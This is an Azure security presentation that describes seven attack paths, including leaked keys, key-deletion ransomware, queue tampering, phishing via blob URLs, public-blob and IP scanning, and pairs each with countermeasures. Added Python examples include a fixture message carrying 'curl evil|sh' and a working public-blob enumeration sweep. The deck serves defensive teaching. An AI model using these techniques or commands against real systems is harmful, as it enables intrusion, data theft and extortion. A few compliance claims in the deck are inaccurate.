7 Dangerous Ways To
Cyberattack Azure
By Abdul Khan
Author
• Abdul Khan
• IT Consultant based in Manchester, UK
• Engineering Lead, Executive, Technologist, Architect
• IT experience within the private and public sectors (Retail, Banking, Digital, Insurance, M.O.D., HMRC, Aviation, Telecommunications,
Housing Associations, Education, Travel and Pharmaceutical companies). Excellent architectural and strong DevOps experience, with a
proven track record of delivering E2E, B2B and B2C solutions on regional and global programmes.
• SME specialising in integration, data migration and digital transformation to cloud solutions (Azure and AWS)
• Wealth of experience in global projects across EMEA, ASPAC and LATAM
• LinkedIn profile https://www.linkedin.com/in/abdul-khan-uk/
Acknowledgements
Thank you to my brother, good friends and colleagues for reviewing, adding value, and sharing their vast experience
and knowledge.
• Samad Khan (IT Manager), specialising in enterprise solutions in finance and wealth management
• Steve Lampton (IT Consultant, Cloud SME), specialising in NetOps, DevOps and SecOps
Audience
Main Audience
• The top cyberthreats are of interest to a wide group of stakeholders who want to understand the threat
landscape in general or to deepen their understanding of particular threats.
• Decision makers, security architects, risk managers, auditors and end users who wish to be informed about
the current state of these cyberthreats should find this material useful.
Assumptions
• The reader has some knowledge of cloud platform technologies.
Content
1.0 Think Like A Hacker
1.1 Introduction
1.2 Hacker Perspective
1.3 The Top Most Dangerous Cyberattacks
1.4 Account Storage – Architecture
1.5 Account Storage – Storage Stamp
2.0 Cyberattacks and Countermeasures
2.1 Attack01 – Access using account keys
2.2 Attack02 – Ransomware attack and encryption
2.3 Attack03 – Attack VMs and Disks
2.4 Attack04 – Storage Tampering attack
2.5 Attack05 – A Phishing attack
2.6 Attack06 – Attack to Blob and resource using anonymous access
2.7 Attack07 – Attacks To The Public and Private IP Addresses in Azure
3.0 Final Thoughts
3.1 Considerations & Best Practices
1.0 Think Like
A Hacker…
“everything and anything is hackable and vulnerable in some ways”
1.1 Introduction
• Microsoft Azure offers many types of tool and technology to manage threats and security: the classical firewall,
encryption, network security groups, MOMS, Security Centre, audit logging, GDPR tooling and much more.
• To identify the most important risks and threats, and how to manage them, we need to choose the right platform,
the one that provides the best features and tools.
• In the cloud, any resource can become a security concern or a target for hacking and should be assessed
for vulnerabilities. A few basic questions should therefore always be asked:
• Is the functionality secure or vulnerable?
• If vulnerable, how can it be exploited and how much damage could it cause?
1.2 Hacker Perspective (1/2)
• From a hacker's perspective the storage account's DNS name carries very important data, because the URL encodes
the account, the partition and the object being requested:
• The Account name is extremely important because Azure uses it to locate the primary storage cluster and the
datacentre where the storage lives; all requests for this account are directed to that location, and an
application can use a different account for each location.
• The Partition name identifies the storage node within the cluster and is used to scale out access to the
data; the ObjectName is the specific object within the partition. Transactions are atomic across the
different objects inside the same PartitionName.
1.2 Hacker Perspective (2/2)
• The Account Storage architecture is organised to provide maximum capacity and scaling; let us look at the most
important components and how they work.
• The Storage Stamp is a cluster of N racks of storage nodes, each rack being a separate fault domain. The challenge
is to keep the storage provisioned in production as highly utilised as possible: a stamp is run at around 70% of
capacity, and when it approaches that level accounts are migrated to another stamp.
• The Location Service manages the account namespace across all the storage stamps and is also responsible for
disaster recovery and load balancing. The LS updates DNS so that requests to
https://AccountName.service.core.windows.net are routed to that storage stamp's virtual IP
(VIP, an IP address the storage stamp exposes for external traffic).
1.3 The Top Most Dangerous Cyberattacks (1/2)
• There are three essential areas in Microsoft Azure, RBAC, Storage and Networking; everything in Azure depends
on these three pillars. Considering these areas, the three most dangerous cyberattacks, the top of the
parade, are:
• Privilege escalation to Azure PIM and the Global Admin account;
• Ransomware attack;
• Attacks on the public and private IP addresses.
• All these attacks are extremely dangerous and effective. However, privilege escalation is the most dangerous
because it can reach the top level, which means losing control of the entire cloud estate and the company.
• Internal attacks are much more dangerous and effective than external ones, and companies often underestimate
that. The cloud is more secure than on-premises, because we can rely on a much more solid infrastructure, but
we know the cloud has weaknesses too.
1.3 The Top Most Dangerous Cyberattacks (2/2)
• RBAC is used to grant a specific user access to a storage account. Hackers use the same mechanism to obtain
access to storage accounts: it is the classic way people manage storage accounts through the Azure Portal.
• The three major areas of Azure are also its weak points, the most critical and vulnerable areas for hackers
to exploit:
• Authentication and Authorization (Azure AD and RBAC),
• Microsoft Azure Storage,
• Networks (Azure infrastructure).
1.4 Account Storage - Architecture
[Diagram: clients access Blobs, Tables and Queues for accounts through https://AccountName.service.core.windows.net;
DNS and the Location Service (account management) direct requests to a Storage Stamp's VIP; each Storage Stamp
contains Front-Ends and the Partition and Stream layers with intra-stamp replication; inter-stamp replication
links the stamps.]
1.5 Account Storage - Storage Stamps
• The three layers in a Storage Stamp:
• The Stream Layer is like a distributed file system within the stamp: it understands files, called streams,
and manages how to store and replicate them, but it knows nothing about the data or its semantics.
• The Partition Layer manages and understands the higher-level data abstractions (Blob, Table, Queue and File),
caches objects and stores them on top of the stream layer.
• The Front-End layer handles authentication and authorization for the account (SAS token, access key or an
Azure AD token) and maps each request for an account to the partition that owns the data.
2.0 Cyberattacks and
Countermeasures
2.1 Attack01 – Access Using Account Keys
Attack
• Developers use account keys everywhere: they send them by email, write them into code and often keep them in
notes files, and there are different techniques to find them.
• Google Dorks are used by hackers to collect any type of information on the internet; it is a very powerful
technique, especially when used in a smart way.
• The query on the slide searches Google's index for any indexed file of type config containing the word
accountkey on the sites githup.com and sourceforge.net.
• "githup" is not a typo: Google may filter some query types, and this spelling evades the filter.
Countermeasures
• Restrict Key Vault creation to a dedicated AD group/user through RBAC, and use Azure Policy to block vaults
that do not meet your standard.
• Apply least privilege to the Key Vault, monitor every access and send an email notification on any change.
• Store all sensitive information in Key Vault and require developers to follow this practice.
• Prefer Azure AD authentication (managed identities) over account keys, rotate the keys regularly and
immediately when a leak is suspected.
• Run automated source-code scanning in Azure DevOps.
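As an added example (not part of the deck), a small scanner for the source-code-scanning countermeasure above: it walks a set of source files and flags Azure Storage account keys, recognising them by their shape (88 base64 characters, always ending in "==", decoding to exactly 64 bytes) and by the AccountName/AccountKey connection-string context that the Google dork targets. The sample repository and FAKE_KEY are constructed for the example; a CI job in Azure DevOps would feed it the checkout instead.

```python
import base64
import binascii
import re

# An Azure Storage account key is 64 random bytes, base64-encoded: 88 characters that
# always end in "==". The look-arounds stop the pattern matching inside a longer blob.
KEY_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{86}==)(?![A-Za-z0-9+/=])")
# A connection string on the same line gives us the account name for the report.
ACCOUNT_RE = re.compile(r"AccountName=([a-z0-9]{3,24})", re.I)
# "AccountKey=", "ACCOUNT_KEY", "account-key": the variable name the deck's dork targets.
KEY_CONTEXT_RE = re.compile(r"account[_-]?key", re.I)


def looks_like_storage_key(candidate: str) -> bool:
    """Cheap confirmation: a real key decodes to exactly 64 bytes."""
    try:
        return len(base64.b64decode(candidate, validate=True)) == 64
    except (binascii.Error, ValueError):
        return False


def scan_text(path: str, text: str) -> list[dict]:
    """Return one finding per account key found in the contents of one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in KEY_RE.finditer(line):
            key = match.group(1)
            if not looks_like_storage_key(key):
                continue
            account = ACCOUNT_RE.search(line)
            findings.append({
                "path": path,
                "line": lineno,
                "kind": "connection_string" if account else "bare_key",
                "account": account.group(1).lower() if account else None,
                # Never copy the full secret into the scanner's own output.
                "key_preview": key[:4] + "..." + key[-4:],
                "named_as_key": bool(KEY_CONTEXT_RE.search(line)),
            })
    return findings


def scan_repo(files: dict[str, str]) -> list[dict]:
    """Scan a mapping of path -> contents; a CI job would build this by walking the checkout."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


# Constructed sample repository. FAKE_KEY is a made-up 64-byte value, not a real credential;
# NOT_A_KEY is 88 base64 characters without the "==" padding, so it must not be reported.
FAKE_KEY = base64.b64encode(bytes(range(64))).decode()
NOT_A_KEY = base64.b64encode(bytes(66)).decode()

SAMPLE_REPO = {
    "web.config": (
        '<add key="Storage" value="DefaultEndpointsProtocol=https;AccountName=ContosoProd;'
        f'AccountKey={FAKE_KEY};EndpointSuffix=core.windows.net" />'
    ),
    "scripts/deploy.py": f'ACCOUNT_KEY = "{FAKE_KEY}"  # TODO: move this to Key Vault\n',
    "README.md": f"Build id: {NOT_A_KEY}\nFetch the key with: az storage account keys list\n",
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_REPO):
        print(finding)
```

Keep the padding and length checks: an 88-character base64 string without "==" cannot be a storage key, which is why the build id in README.md is not reported, and the report carries only a preview of each key so that the scanner output is not itself a leak.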
2.2 Attack02 – Ransomware Attack And Encryption
Attack
• Azure encrypts all data at rest in a storage account, a key requirement for certifications such as ISO 27001,
ISO 9001 and GDPR. But is there a real risk of a ransomware attack in the cloud? Yes. So what can a hacker do?
Potentially the entire storage account, all virtual machines and all disks can be encrypted.
• A hacker could achieve privilege escalation in the cloud, or find the account keys and access the storage
account. Once that is achieved the hacker has different choices; one quick and very dangerous attack targets
the encryption keys, with which an attacker is able to lock the entire storage account. Azure uses two
mechanisms to encrypt the data:
• one using the platform's internal encryption key;
• the second using a customer-managed key created by the customer and held in Key Vault.
• Attack simulation against the encryption keys. The hacker needs only basic knowledge of Storage Accounts and
Key Vault, and can:
• execute a privilege escalation attack in Azure (Contributor access to the resource group is required);
• enter the Key Vault and delete the customer-managed key; the data encrypted under that key is then unreadable.
2.2 Attack02 – Ransomware Attack And Encryption
Countermeasures
• The best option is to use policies to block any unauthorised usage, especially creation.
• Restrict Key Vault creation to a dedicated AD group/user through RBAC, and use Azure Policy to block vaults
that do not meet your standard.
• Enable soft-delete and purge protection on every Key Vault, so that a deleted key can be recovered within
the retention period and cannot be purged by the attacker.
• Apply least privilege to the Key Vault, monitor every access and send an email notification on any change.
• Use Multi-Factor Authentication in every sensitive location of the company.
2.3 Attack03 – Attack VMs and Disks
Attack
• Another option is to encrypt the content of the storage account, for example all the disks; this is a
procedure that can be carried out remotely with PowerShell.
Countermeasures
• Restrict disk-encryption operations to a dedicated AD group/user through RBAC, and enforce your encryption
standard with Azure Policy.
• Apply least privilege to the resources.
• Keep backups and snapshots that the compromised identity cannot delete, so that the disks can be restored.
• Use Multi-Factor Authentication in every sensitive location of the company.
2.4 Attack04 – Storage Tampering attack
Attack
• This is an extremely effective and dangerous attack: the hacker has found the storage account keys and scans the
account; the slide shows an example of listing the blobs with the Azure CLI.
• The attacker now has a clear idea of the content and may inject malicious content into the storage account:
malicious scripts, tampered PDF files and more.
• Developers and IT administrators use queues to execute specific infrastructure tasks in FIFO order; the hacker
could inject messages into the queue and have arbitrary code and scripts executed.
• Azure storage tampering is usually used in conjunction with a phishing attack.
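The queue injection described above works because the consumer trusts whatever the message says. As an added example, not from the deck, the following contrasts that naive consumer with a hardened one that only executes messages carrying a valid HMAC-SHA256 from the producer, that are fresh, and whose task name is on an allow-list. The envelope format, the task names, SECRET and the sample queue are all constructed for the example; the design point is that the signing secret is held in Key Vault, separately from the storage account key, so finding the key alone (Attack01) is not enough to drive the worker.

```python
import hashlib
import hmac
import json

# Assumed message format (not the deck's): a JSON envelope whose body carries the task name,
# its arguments and a timestamp, plus an HMAC-SHA256 over the canonical body. The signing
# secret lives in Key Vault, separately from the storage account key.
ALLOWED_TASKS = {"rotate-logs", "snapshot-disk"}
MAX_AGE_SECONDS = 300


def canonical(body: dict) -> bytes:
    """Stable serialisation so producer and consumer sign exactly the same bytes."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign_message(secret: bytes, task: str, args: dict, now: int) -> str:
    body = {"task": task, "args": args, "ts": now}
    mac = hmac.new(secret, canonical(body), hashlib.sha256).hexdigest()
    return json.dumps({"body": body, "mac": mac})


def naive_task(raw: str) -> str:
    """The vulnerable consumer: whatever task name is in the message gets executed."""
    msg = json.loads(raw)
    return msg.get("task") or msg["body"]["task"]


def verify_message(secret: bytes, raw: str, now: int) -> dict:
    """Hardened consumer: return the body only if it is authentic, fresh and allow-listed."""
    try:
        envelope = json.loads(raw)
        body, mac = envelope["body"], envelope["mac"]
    except (ValueError, KeyError, TypeError):
        raise ValueError("malformed message")
    expected = hmac.new(secret, canonical(body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        raise ValueError("bad signature")
    if not isinstance(body.get("ts"), int) or now - body["ts"] > MAX_AGE_SECONDS:
        raise ValueError("stale message")
    if body.get("task") not in ALLOWED_TASKS:
        raise ValueError("task not allow-listed")
    return body


def drain_queue(secret: bytes, raw_messages: list[str], now: int) -> tuple[list[str], list[str]]:
    """Process a batch in FIFO order; return (tasks to run, rejection reasons)."""
    executed, rejected = [], []
    for raw in raw_messages:
        try:
            executed.append(verify_message(secret, raw, now)["task"])
        except ValueError as err:
            rejected.append(str(err))
    return executed, rejected


# Constructed sample queue. SECRET stands in for a value fetched from Key Vault at start-up.
SECRET = b"demo-signing-secret-from-key-vault"
NOW = 1_700_000_000
SAMPLE_QUEUE = [
    sign_message(SECRET, "snapshot-disk", {"disk": "vm01-os"}, NOW - 10),
    # Injected with the storage account key alone: the attacker cannot produce a valid MAC.
    json.dumps({"body": {"task": "run-script", "args": {"cmd": "curl evil|sh"}, "ts": NOW},
                "mac": "00" * 32}),
    # Plain message from an old producer that never signed anything.
    json.dumps({"task": "rotate-logs"}),
    # Signed, but replayed long after it was issued.
    sign_message(SECRET, "rotate-logs", {}, NOW - 3600),
    # Signed by someone holding the secret, but the task itself is not allow-listed.
    sign_message(SECRET, "run-script", {"cmd": "whoami"}, NOW),
]

if __name__ == "__main__":
    print("naive consumer would run:", [naive_task(m) for m in SAMPLE_QUEUE])
    print("hardened consumer:", drain_queue(SECRET, SAMPLE_QUEUE, NOW))
```

If the attacker also obtains the signing secret the check is moot, which is why the deck's Key Vault least-privilege and monitoring advice applies to that secret as much as to the storage keys themselves.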
2.4 Attack04 – Storage Tampering attack
Countermeasures
• Prevention is the best countermeasure: we must prevent access to the resource.
• Restrict access to the storage account to a dedicated AD group/user through RBAC, and enforce your standard
with Azure Policy.
• Apply least privilege to the storage account and to the specific resource, monitor every access and send an
email notification on any change.
• Refer to Attack01 regarding the protection of the keys.
• Use Multi-Factor Authentication in every sensitive location of the company.
2.5 Attack05 – A Phishing attack
Attack
• This is a widely used attack because it can be combined with others in many different ways; the concept is very
simple.
• A blob in Azure Storage is served from a Microsoft-owned domain under windows.net, which mail filters treat as a
trusted web site, so the attacker can send email using this URL without being intercepted or blocked, and it looks
like a legitimate URL. The hacker can simulate an internal communication, and an employee could click on the URL
and open a malicious file hosted in the blob.
• This is a very simple example; in the future we will examine some nastier phishing attacks using a blob storage
account.
Countermeasures
• Robust email security solutions are actually the best option; also filter any email containing the windows.net
domain, or at least flag links to blob.core.windows.net accounts that your organisation does not own.
• Educate employees about recognising the different types of phishing attack and avoiding clicking on any link.
• Use multiple security layers: scan email, run antivirus and use the red team to test malicious attacks.
• Educate everybody in the company, including the very top management.
• Use Multi-Factor Authentication in every sensitive location of the company.
2.6 Attack06 – Attack To Blob And Resource Using
Anonymous Access
Attack
• The read access level of a container and its blobs can be set to anonymous. We may need this setting because we
want to provide public access to our content; hackers use the same setting for phishing attacks.
• Black hats scan the public internet daily and check the contents of these blobs by:
• Option 1 – Using Shodan: log in with a free account to Shodan.io and use the search string shown on the slide.
• Option 2 – Using scripting: this is the most productive and effective way to collect anonymous blob storage
accounts; any scripting technique will do, and the concept is quite simple.
• On an HTTP GET, an anonymous (public) blob container responds differently from a private one; this difference is
the discriminant.
• A program or script generates every possible combination of account name and checks for any public blob on the
internet. The procedure is a simple representation of what criminal organisations do with very high computing
power.
• The programs these organisations use are specifically designed to check the content, and they use artificial
intelligence to decide quickly whether the content is useful or not.
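As an added example, not code from the deck: the discriminant described above in working form. It generates candidate account names for a company within Azure's naming rule (3 to 24 lowercase letters and digits), issues the anonymous container-listing request, and classifies the response. The HTTP fetch is injected as a function, so the same code runs here against a constructed fake internet and, with `requests.get` wired in, against your own estate. The sample responses are constructed in the shape the Blob service returns (200 with an EnumerationResults listing for a public container, 409 PublicAccessNotPermitted when the account disallows public access, 404 otherwise); the container name "backups" and the suffix list are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Azure storage account names: 3-24 lowercase letters and digits, globally unique.
ACCOUNT_NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")
# Anonymous container listing: the request the discriminant is based on.
LIST_URL = "https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"
SUFFIXES = ("", "prod", "dev", "test", "backup", "data", "logs")   # assumed wordlist


def candidate_accounts(company: str) -> list[str]:
    """Name permutations an attacker would try for one company, filtered by the naming rule."""
    base = re.sub(r"[^a-z0-9]", "", company.lower())
    names = {f"{base}{s}" for s in SUFFIXES} | {f"{s}{base}" for s in SUFFIXES}
    return sorted(n for n in names if ACCOUNT_NAME_RE.match(n))


def classify(response) -> str:
    """Classify the anonymous GET. `response` is (status, body), or None if DNS did not resolve."""
    if response is None:
        return "no-such-account"            # NXDOMAIN: nobody owns this account name
    status, body = response
    if status == 200 and "<EnumerationResults" in body:
        return "public-container"           # listing succeeded: anyone can enumerate the blobs
    if "PublicAccessNotPermitted" in body:
        return "private-account"            # account-level public access is disabled
    if status in (403, 404):
        return "not-anonymously-readable"   # exists, but private or no such container
    return f"unexpected-{status}"


def blob_names(listing_xml: str) -> list[str]:
    """What actually leaks from a public container: every blob name in the listing."""
    root = ET.fromstring(listing_xml)
    return [name.text for name in root.iter("Name")]


def sweep(company: str, fetch, container: str = "backups") -> dict[str, str]:
    """Try every candidate account; `fetch(url)` performs the GET (injected so this runs offline)."""
    return {acct: classify(fetch(LIST_URL.format(account=acct, container=container)))
            for acct in candidate_accounts(company)}


# Constructed responses in the shape the Blob service returns (assumed, not captured traffic).
PUBLIC_LISTING = (
    '<EnumerationResults ServiceEndpoint="https://contosobackup.blob.core.windows.net/" ContainerName="backups">'
    "<Blobs><Blob><Name>sql-2024-01.bak</Name></Blob><Blob><Name>vpn-config.ovpn</Name></Blob></Blobs>"
    "<NextMarker /></EnumerationResults>"
)
NOT_PERMITTED = ("<Error><Code>PublicAccessNotPermitted</Code>"
                 "<Message>Public access is not permitted on this storage account.</Message></Error>")
NOT_FOUND = ("<Error><Code>ResourceNotFound</Code>"
             "<Message>The specified resource does not exist.</Message></Error>")

FAKE_INTERNET = {            # account name -> (status, body); any other name does not resolve
    "contoso": (404, NOT_FOUND),
    "contosoprod": (409, NOT_PERMITTED),
    "contosobackup": (200, PUBLIC_LISTING),
}


def fake_fetch(url: str):
    """Stand-in for requests.get(url) that answers from FAKE_INTERNET."""
    account = re.match(r"https://([a-z0-9]+)\.blob\.core\.windows\.net/", url).group(1)
    return FAKE_INTERNET.get(account)


if __name__ == "__main__":
    for account, verdict in sweep("Contoso", fake_fetch).items():
        print(f"{account:20} {verdict}")
    print("leaked:", blob_names(PUBLIC_LISTING))
```

Run the sweep against the names your own organisation is likely to have used; anything that comes back as public-container is what the criminal scanners already see.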
2.6 Attack06 – Attack To Blob And Resource Using
Anonymous Access
Countermeasures
• Don’t publish any sensitive information in public storage.
• Disable public blob access at the storage account level (allowBlobPublicAccess = false) and enforce it with
Azure Policy, so that no container can be made anonymous by mistake.
Important Note
• Public blobs can be a good honey trap: criminals will focus on that specific area of attack, and you can also
plant false and misleading information there.
• The honey trap is an interesting strategy and can be extremely effective if well planned; we can also make the
criminal think what we want them to think and discourage them from investigating the company any further.
2.7 Attack07 – Attacks To The Public and Private IP
Addresses In Azure
Attack
• A public IP is attacked within the first five minutes of its life on the internet; this is standard procedure, and
these people are criminal organisations looking for information to use against the company and its employees.
Public IPs exposed in Azure are very easy to find: the entire Azure infrastructure can be scanned for public IPs
with open RDP ports with the single command shown on the slide, and the hacker can download the entire Azure IP
range, published by Microsoft as the Azure IP Ranges and Service Tags download; this is all public information.
• Never underestimate the internal threats: if a hacker penetrates a VM, they also gain access to the internal
network, at least within the subnet, and if the VM is domain-joined the escalation of the damage is not
measurable; it depends on the hacker's Azure experience.
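The Azure IP range the slide refers to is published by Microsoft as a JSON file (the Azure IP Ranges and Service Tags download). As an added example, not from the deck, the following parses an excerpt in that file's shape and answers both the attacker's question (how many addresses a sweep would have to cover) and the defender's (which source addresses in my firewall or sign-in logs are Azure, and which service tag they fall under). The excerpt is constructed: the tag names are real service tags, but the prefixes are documentation ranges standing in for the real values.

```python
import ipaddress
import json

# Constructed excerpt in the shape of Microsoft's "Azure IP Ranges and Service Tags - Public Cloud"
# download. Tag names are real service tags; the prefixes are RFC 5737 / RFC 3849 documentation
# ranges standing in for the real values.
SERVICE_TAGS_JSON = """{
  "changeNumber": 1, "cloud": "Public",
  "values": [
    {"name": "AzureCloud.uksouth", "id": "AzureCloud.uksouth",
     "properties": {"region": "uksouth", "platform": "Azure", "systemService": "",
                    "addressPrefixes": ["203.0.113.0/24", "2001:db8:1::/48"]}},
    {"name": "AzureBastion", "id": "AzureBastion",
     "properties": {"region": "", "platform": "Azure", "systemService": "AzureBastion",
                    "addressPrefixes": ["203.0.113.0/28"]}},
    {"name": "AzureCloud.northeurope", "id": "AzureCloud.northeurope",
     "properties": {"region": "northeurope", "platform": "Azure", "systemService": "",
                    "addressPrefixes": ["198.51.100.0/24"]}}
  ]
}"""


def load_prefixes(text: str) -> list[tuple]:
    """Flatten the file into (tag, region, network) rows, most specific prefixes first."""
    doc = json.loads(text)
    rows = []
    for entry in doc["values"]:
        props = entry["properties"]
        for prefix in props["addressPrefixes"]:
            rows.append((entry["name"], props["region"], ipaddress.ip_network(prefix, strict=False)))
    rows.sort(key=lambda row: row[2].prefixlen, reverse=True)
    return rows


def address_count(rows, version: int = 4) -> int:
    """How many distinct addresses a scanner would have to sweep (overlapping prefixes counted once)."""
    nets = [row[2] for row in rows if row[2].version == version]
    return sum(net.num_addresses for net in ipaddress.collapse_addresses(nets))


def tags_for(ip: str, rows) -> list[str]:
    """Every service tag whose prefix contains `ip`, most specific first."""
    addr = ipaddress.ip_address(ip)
    return [tag for tag, _region, net in rows if addr.version == net.version and addr in net]


def triage(ips: list[str], rows) -> dict[str, list[str]]:
    """For a batch of source addresses from firewall or sign-in logs: which are Azure, and which part of it."""
    return {ip: tags_for(ip, rows) for ip in ips}


if __name__ == "__main__":
    rows = load_prefixes(SERVICE_TAGS_JSON)
    print("IPv4 addresses covered by these tags:", address_count(rows))
    for ip, tags in triage(["203.0.113.5", "203.0.113.200", "198.51.100.9", "192.0.2.1"], rows).items():
        print(f"{ip:16} {tags or ['not Azure']}")
```

The same lookup is what lets a defender separate traffic from their own Azure Bastion or VPN gateway from an attacker who merely rents a VM in the same region: both carry an Azure service tag, so the tag alone is never an allow-list.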
Countermeasures
• Option 1 – The basic solution is to avoid using public IPs; if you really need one, lock it down with an NSG and
hide it behind a firewall or NAT.
• Option 2 – Control the creation of new public IPs.
• Option 3 – Use Azure Bastion.
• Option 4 – Use a VPN.
• VPN is the best option because it avoids exposure to the internet; however, we still need to handle the private
IPs because we can face an internal attack.
3.0 Final Thoughts
3.1 Considerations & Best Practices
• Centralise security control and access using a good subscription structure and a firewall appliance.
• Create a base subscription, install ExpressRoute and the firewall there, and propagate the connectivity to the
other subscriptions; this gives you a lot of control.
• Use proper network segmentation and organise your IP schemas and VNets by region.
• Create Azure Policies and enforce your network rules.
• Use a Zero Trust approach and limit all access.
• This presentation has highlighted some of the most important and dangerous attacks on the Storage Account;
prevention is always the best practice, and to achieve it we need to use Azure Policies.
• Azure Policies are the first line of defence, the first opportunity to stop the attack. This is what we need to
achieve: stop the attack at the beginning, not while it is under way.
• The most dangerous attacks always start from the inside; we need to make our home secure from any risk.
• Don't trust anybody, even yourself: if you are not sure about something, ask and discuss it with the team.
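Azure Policy is the recurring countermeasure in 2.2, 2.6 and 2.7 and the first line of defence above, but the deck never shows a rule. The following is an added example, not the deck's own material: three deny-effect rules in Azure Policy's rule syntax (the aliases Microsoft.KeyVault/vaults/enablePurgeProtection, Microsoft.Storage/storageAccounts/allowBlobPublicAccess and the tags['name'] form are real; the tag name "exposure" is an assumption), plus a small local evaluator for the subset of the rule language they use, so the deny decisions can be checked offline against constructed resource documents before the definitions are assigned to a subscription. The evaluator's alias resolution is a simplification of the service's.

```python
import re

# Evaluator for the subset of Azure Policy rule syntax used below: field conditions with
# equals / notEquals / exists / in, combined with allOf / anyOf / not. Alias resolution is
# simplified: "Microsoft.X/y/prop" reads resource["properties"]["prop"] for a resource of
# type Microsoft.X/y, and "tags['k']" reads resource["tags"]["k"].
_TAG_RE = re.compile(r"^tags\['([^']+)'\]$")


def _field(resource: dict, alias: str):
    if alias in ("type", "name", "location"):
        return resource.get(alias)
    tag = _TAG_RE.match(alias)
    if tag:
        return (resource.get("tags") or {}).get(tag.group(1))
    rtype = resource.get("type", "")
    if not alias.lower().startswith(rtype.lower() + "/"):
        return None                              # alias belongs to another resource type
    value = resource.get("properties", {})
    for part in alias[len(rtype) + 1:].split("/"):
        if not isinstance(value, dict) or part not in value:
            return None
        value = value[part]
    return value


def _eq(a, b) -> bool:
    """Azure Policy compares strings case-insensitively and booleans as "true"/"false"."""
    if isinstance(a, bool):
        a = str(a).lower()
    if isinstance(a, str) and isinstance(b, str):
        return a.lower() == b.lower()
    return a == b


def matches(cond: dict, resource: dict) -> bool:
    if "allOf" in cond:
        return all(matches(c, resource) for c in cond["allOf"])
    if "anyOf" in cond:
        return any(matches(c, resource) for c in cond["anyOf"])
    if "not" in cond:
        return not matches(cond["not"], resource)
    value = _field(resource, cond["field"])
    if "exists" in cond:
        return (value is not None) == (str(cond["exists"]).lower() == "true")
    if "equals" in cond:
        return _eq(value, cond["equals"])
    if "notEquals" in cond:
        return not _eq(value, cond["notEquals"])
    if "in" in cond:
        return any(_eq(value, v) for v in cond["in"])
    raise ValueError(f"unsupported condition: {cond}")


def denied_by(policies: dict, resource: dict) -> list[str]:
    """Names of deny policies whose rule fires; an empty list means the deployment goes through."""
    return [name for name, rule in policies.items()
            if rule["then"]["effect"].lower() == "deny" and matches(rule["if"], resource)]


POLICIES = {
    # 2.2: a vault without purge protection lets an attacker delete the CMK beyond recovery.
    "deny-keyvault-without-purge-protection": {
        "if": {"allOf": [
            {"field": "type", "equals": "Microsoft.KeyVault/vaults"},
            {"anyOf": [
                {"field": "Microsoft.KeyVault/vaults/enablePurgeProtection", "exists": "false"},
                {"field": "Microsoft.KeyVault/vaults/enablePurgeProtection", "notEquals": "true"}]}]},
        "then": {"effect": "deny"}},
    # 2.6: no storage account may allow anonymous blob access.
    "deny-storage-public-blob-access": {
        "if": {"allOf": [
            {"field": "type", "equals": "Microsoft.Storage/storageAccounts"},
            {"not": {"field": "Microsoft.Storage/storageAccounts/allowBlobPublicAccess", "equals": "false"}}]},
        "then": {"effect": "deny"}},
    # 2.7: public IPs only when explicitly approved (the tag name "exposure" is an assumption).
    "deny-unapproved-public-ip": {
        "if": {"allOf": [
            {"field": "type", "equals": "Microsoft.Network/publicIPAddresses"},
            {"not": {"field": "tags['exposure']", "equals": "approved"}}]},
        "then": {"effect": "deny"}},
}

# Constructed resource documents, in the shape the policy engine evaluates.
VAULT_OK = {"type": "Microsoft.KeyVault/vaults", "name": "kv-prod",
            "properties": {"enableSoftDelete": True, "enablePurgeProtection": True}}
VAULT_BAD = {"type": "Microsoft.KeyVault/vaults", "name": "kv-dev", "properties": {"enableSoftDelete": True}}
STORAGE_BAD = {"type": "Microsoft.Storage/storageAccounts", "name": "contosobackup",
               "properties": {"allowBlobPublicAccess": True}}
STORAGE_OK = {"type": "Microsoft.Storage/storageAccounts", "name": "contosoprod",
              "properties": {"allowBlobPublicAccess": False}}
PIP_BAD = {"type": "Microsoft.Network/publicIPAddresses", "name": "pip-rdp-test", "properties": {}}
PIP_OK = {"type": "Microsoft.Network/publicIPAddresses", "name": "pip-waf",
          "tags": {"exposure": "approved"}, "properties": {}}

if __name__ == "__main__":
    for res in (VAULT_OK, VAULT_BAD, STORAGE_BAD, STORAGE_OK, PIP_BAD, PIP_OK):
        hits = denied_by(POLICIES, res)
        print(f"{res['name']:16} {'DENY: ' + ', '.join(hits) if hits else 'allowed'}")
```

Note that a policy decides on the resource being deployed, never on who deploys it: restricting Key Vault or public IP creation to a dedicated AD group is an RBAC assignment, and the policy is what stops even that group from creating a vault without purge protection or a storage account with public blob access.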
- END OF DECK
By Abdul Khan – https://www.linkedin.com/in/abdul-khan-uk/

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
